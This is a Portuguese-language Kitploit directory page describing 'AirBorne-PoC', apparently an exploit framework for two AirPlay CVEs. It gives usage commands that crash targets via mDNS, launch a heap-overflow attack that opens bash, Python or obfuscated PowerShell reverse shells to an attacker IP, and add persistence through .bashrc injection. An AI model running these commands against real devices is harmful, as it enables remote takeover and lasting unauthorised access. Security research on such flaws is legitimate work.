Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
AirBorne-PoC — poc para CVE-2025-24252 & CVE-2025-24132 | Kitploit
Ferramentas/GitHubGitHub/ekomssavior/airborne-poc
Mecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoShellcodePós-ExploraçãoComando e ControleFerramenta de Acesso RemotoDesenvolvimento de PayloadsExploração de Binários
GitHubekomssavior/airborne-poc

AirBorne-PoC

poc para CVE-2025-24252 & CVE-2025-24132

1642743há 8 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
Compartilhar

AirBorne PoC Framework – Edição RCE de Elite

Framework PoC completo para CVE-2025-24252 e CVE-2025-24132
Por ekomsSavior |

AirBorne é um framework de prova de conceito (PoC) combinado que visa duas vulnerabilidades graves no serviço AirPlay da Apple. Ele inclui um gatilho de crash completo e um exploit de reverse shell funcional com persistência opcional, listener e múltiplos formatos de payload — tudo em um único script.

Procurando pela versão original?
A edição legada ainda está disponível no branch legacy deste repositório.
Para fazer o checkout:

root@kitploit:~
git checkout legacy

CVEs Abordados

CVE-2025-24252 – Crash do Registro TXT mDNS

  • Aciona um crash no daemon AirPlayReceiver por meio de um pacote mDNS malformado
  • Funciona via broadcast UDP na porta 5353

CVE-2025-24132 – Heap Overflow → Reverse Shell (RCE)

  • Aciona um estouro de heap (heap overflow) no serviço TCP do AirPlay na porta 7000
  • Suporta payloads de reverse shell em bash, python e PowerShell
Baixar ferramenta
  • Inclui persistência opcional usando injeção em .bashrc (Linux)

  • Primeiros Passos

    1. Clone o Repositório

    root@kitploit:~
    git clone https://github.com/ekomsSavior/AirBorne-PoC.git
    cd AirBorne-PoC
    

    2. Instale as Dependências

    root@kitploit:~
    sudo apt update
    sudo apt install -y python3-scapy netcat
    

    Visão Geral da Execução

    O único script airborne.py inclui ambos os PoCs e toda a lógica:

    • Selecione uma CVE usando --exploit
    • Defina um payload de reverse shell usando --payload
    • Inicia automaticamente um listener netcat para você
    • Opcionalmente, ativa a persistência no alvo usando --persistent

    Exemplos de Uso

    Provocar Crash no Alvo com Pacote mDNS (CVE-2025-24252)

    root@kitploit:~
    sudo python3 airborne.py --exploit 24252 --interface wlan0
    

    Requer uma interface em modo monitor.


    Executar Heap Overflow → RCE (CVE-2025-24132)

    Inicie o exploit completo com o shell bash padrão:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
    

    Escolha o shell Python em vez disso:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
    

    Ative a persistência real em alvos Linux:

    root@kitploit:~
    sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
    

    Apenas injeção de comando shell

    root@kitploit:~
    sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
    

    Opções de Payload

    PayloadDescrição
    bashReverse shell bash padrão via TCP
    pythonReverse shell baseado em Python usando socket e pty
    powershellPayload RCE completo em Windows PowerShell (ofuscado)

    Modo de Persistência

    Ao usar --persistent, o script anexará o payload de reverse shell codificado ao arquivo do alvo:

    root@kitploit:~
    ~/.bashrc
    

    Isso garante que um shell seja devolvido a você toda vez que o usuário fizer login ou um terminal for iniciado.


    Notas de Manutenção

    • Reverse shells são codificados usando base64 e enviados após o estouro de buffer (buffer overflow)
    • Todos os payloads são enviados pela porta 7000
    • Pacotes mDNS são enviados via UDP 5353 e exigem permissão de socket bruto (raw socket)
    • Certifique-se de que o IP da sua máquina de ataque seja acessível pelo dispositivo alvo
    • O script lida com casos básicos de erro e falha silenciosamente se as portas estiverem fechadas

    Aviso Ético

    Este projeto destina-se apenas a fins educacionais, éticos e de pesquisa autorizada.

    • Você deve ter permissão explícita para testar o sistema alvo.
    • Você assume total responsabilidade por quaisquer ações realizadas.

    A exploração não autorizada de sistemas é ilegal e antiética.


    Créditos

    • Criado por ekomsSavior
    • Inspirado por CVEs reais e pesquisas de desenvolvimento de exploits